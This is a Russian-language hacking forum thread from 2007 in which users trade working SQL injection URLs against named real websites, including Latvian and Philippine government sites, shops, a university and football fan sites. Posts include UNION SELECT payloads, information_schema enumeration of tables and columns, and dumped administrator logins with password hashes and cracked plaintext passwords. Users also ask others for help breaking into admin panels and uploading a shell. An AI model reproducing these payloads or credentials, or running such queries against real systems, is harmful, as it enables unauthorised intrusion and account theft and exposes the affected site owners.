05.05.2007, 17:03
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
С нами:
10282956
Репутация:
380
|
|
Сообщение от Barney
http://director-online.com/buildArticle.php?id=1089'+union+select+1,2,3,4,5,6 ,7,8,9,10,11,12,13,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28,29,30/*
до 30 дошел и забил... может я слепой =(
http://director-online.com/buildArticle.php?id=-1111+UNION+SELECT+1,2,3,4,5,6,7,8/*
Пропустил
.gov
Код:
http://www.sprk.gov.lv/index.php?id=-1111+UNION+SELECT+1,2,3,4,5,convert(VERSION()+using+latin1),7,8,9,10,11,12,13,14,15/*
Последний раз редактировалось maxster; 05.05.2007 в 17:24..
|
|
|
05.05.2007, 18:32
|
|
Banned
Регистрация: 11.10.2006
Сообщений: 682
С нами:
10306406
Репутация:
271
|
|
Какой-то магазин
http://artbridge.ru/show_concurs.php?id=9999999+union+select+1,2,3,4,5 ,6,7,8,9,10,11,12,13,14+from+admins&lang=r
Если кто-то узнает пасс от админки прошу стукнуть мне в ацку.Логин админа ABridge  |
|
|
|
05.05.2007, 18:42
|
|
Участник форума
Регистрация: 11.01.2007
Сообщений: 125
С нами:
10173287
Репутация:
27
|
|
http://www.gamesfirst.com/index.php?id=1132'+UNION+SELECT+1,2,3,5,6,7,8,9/*
тут тоже наверное что-то есть...
и тут
http://www.dfalink.com/event.php?id=18354'+UNION+SELECT+1,2,3,4,5,6,7,8,9 ,10/*
Последний раз редактировалось Barney; 05.05.2007 в 18:46..
|
|
|
|
05.05.2007, 19:30
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами:
10041506
Репутация:
572
|
|
a1ex
http://artbridge.ru/show_concurs.php?lang=r&id=9999999+union+select+1, 2,3,concat_ws(0x3a,id,login,passw),5,6,7,8,9,10,11 ,12,13,14+from+admins/*
5:ABridge:9aac48d130bcb88c5f39065b4092a1d1
А вообще - это уже было, смотри http://hlamidnik.h18.ru/SQLS.html
Barney
http://www.gamesfirst.com/*
http://director-online.com/
- то же самое.
|
|
|
|
05.05.2007, 19:47
|
|
Участник форума
Регистрация: 11.01.2007
Сообщений: 125
С нами:
10173287
Репутация:
27
|
|
http://www.reusablebags.com/facts.php?id=4'
попытался, но как всегда что-то упускаю =))
зы
тут есть онлайн шоп, так что может что нить найдете интересного
|
|
|
|
05.05.2007, 19:55
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами:
10041506
Репутация:
572
|
|
boyan
Barney
Проверяй, пожалуйста, прежде чем публиковать - было или нет.
http://hlamidnik.h18.ru/SQLS.html
твоя ссылка там на 4х позициях )
-----cont
www.liverpoolfc.ru
1:Jari:034054de62d75ca7:jokerit
Последний раз редактировалось Серенький; 05.05.2007 в 22:30..
Причина: boyan
|
|
|
|
05.05.2007, 22:55
|
|
Участник форума
Регистрация: 27.10.2006
Сообщений: 205
С нами:
10282956
Репутация:
380
|
|
Centre for Social Research on Alcohol and Drugs
Код:
http://www.sorad.su.se/projects.php?Id=-1111+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12+from+admin/*
Что-то там больше ничего нет =)
_______________________________
Фух, хитрые гады, долго пытался шел залить не смог...
Если кто сможет отпишитесь и расскажите
Код:
http://www.resejournalen.se/destination.php?Id=-1111+UNION+SELECT+0x6e616d653a70617373776f7264,concat(username,0x3a,user_password),3,4,5,6,7,8,9,10,11,12+from+phpbb_users+where+user_id=2/*
Andreas:5bf39735e3e4966a31fa1f58d6a94a1d: Trustno0
Еще 1 таже ситуация
Код:
http://www.sko.miun.se/page.php?kategori=35&underkategori=-1111+UNION+SELECT+1,concat_ws(0x3a,username,user_password),3,4,5,6,7+from+phpbb_users/*
admin:ba952731f97fb058035aa399b1cb3d5c: karen
там 2 форума, 1 основной, 2 левый (http://www.sko.miun.se/phpBB2/) это пасс от левого, т.к. префикс главного не угадал! =)
__________________
Веб админы блин
Код:
http://webxadmin.free.fr/article.php?i=-1111+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12/*
Последний раз редактировалось maxster; 06.05.2007 в 16:27..
|
|
|
|
06.05.2007, 16:39
|
|
Новичок
Регистрация: 12.04.2007
Сообщений: 12
С нами:
10042829
Репутация:
20
|
|
Филлипинский парламент
Код:
http://www.congress.gov.ph/press/details.php?pressid=-1+union+select+1,concat(user(),0x81,version(),0x81,database()),3,4,5,6,7,8--
|
|
|
|
06.05.2007, 18:29
|
|
Banned
Регистрация: 13.04.2007
Сообщений: 123
С нами:
10041506
Репутация:
572
|
|
sql-not_finished
Незавершенное:
Сайт: http://www.password.ru/ (Каталог cайтов c красивым названием)
http://password.ru/sites.php?cat=16+and+1=0+union+select+1,2,3,concat _ws(user(),version(),database())/*
http://password.ru/admin/admin.php
Сайт: http://www.fc-arsenal.com/ (ARSSC: Официальный фан-клуб "Арсенала" в России)
http://www.fc-arsenal.com/index.php?page=news&id=-1289+union+select+1,2,concat_ws(0x3a,user(),versio n(),database()),4,5,6,7,8/*
http://www.fc-arsenal.com/admin
Сайт: http://www.fcalania.ru/ (АЛАНСКИЕ БАРСЫ. Сайт болельщиков ФК АЛАНИЯ)
http://www.fcalania.ru/press/publication.php?id=-1930'+union+select+1,2,3,4,5,6,concat_ws(0x3a,user (),version(),database())/*
Готовое
----------------------------------------------------------------- вопросик
Сайт: http://www.shinnik.yar.ru/ (Официальный сайт ФК Шинник)
поглядим на версию и улыбнемся, так как она пятая)
http://www.shinnik.yar.ru/modules.php?op=modload&name=News&file=article&sid=-1160+union+select+1,version(),3,4,5,6,7,8,9,0,1,2, 3,4,5,6,7,8,9,0,1/*
смотрим таблицы через системную бд information_schema
http://www.shinnik.yar.ru/modules.php?op=modload&name=News&file=article&sid=-1160+union+select+1,table_name,3,4,5,6,7,8,9,0,1,2 ,3,4,5,6,7,8,9,0,1+from+information_schema.tables+ limit+125,1/*
и видим там таблицу nuke_users Но кавычки скринятся и не удается посмотреть названия полей в таблице -
http://www.shinnik.yar.ru/modules.php?op=modload&name=News&file=article&sid=-1160+union+select+1,column_name,3,4,5,6,7,8,9,0,1, 2,3,4,5,6,7,8,9,0,1+from+information_schema.column s+where+table_name='nuke_users'+limit+0,1/*
не проходит,
так вот вопрос - как это обойти, как изменить запрос, чтоб увидеть названия полей?
*админка недалеко, вперед и направо - http://www.shinnik.yar.ru/admin.php
upd. Скачал PostNuke, на котором построен сайт, посмотрел названия полей они все с префиксом pn_ так что
искомые поля - pn_uid,pn_uname,pn_pass,pn_email
http://www.shinnik.yar.ru/modules.php?op=modload&name=News&file=article&sid=-1160+union+select+1,concat_ws(0x3a,pn_uid,pn_uname ,pn_pass,pn_email),3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8 ,9,0,1+from+nuke_users+limit+1,1/*
2:admin:ff9830c42660c1dd1942844f8069b74a
Пароль админа очень многозначительный - root123
Вот, но вопрос в силе.
Последний раз редактировалось Серенький; 06.05.2007 в 18:56..
|
|
|
|
06.05.2007, 18:12
|
|
Постоянный
Регистрация: 11.03.2007
Сообщений: 581
С нами:
10088966
Репутация:
646
|
|
Очень интересно, смотрите сами:
Код:
http://www.188888.ru/download.php?file_id=-1+union+select+1/*
http://www.188888.ru/download.php?file_id=-1+union+select+1,2/*
Ну а тут все понятно
Код:
http://www.box-cd.com/p_magazin.php?tip=1+union+select+1,version()/*
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Комбинированный вид
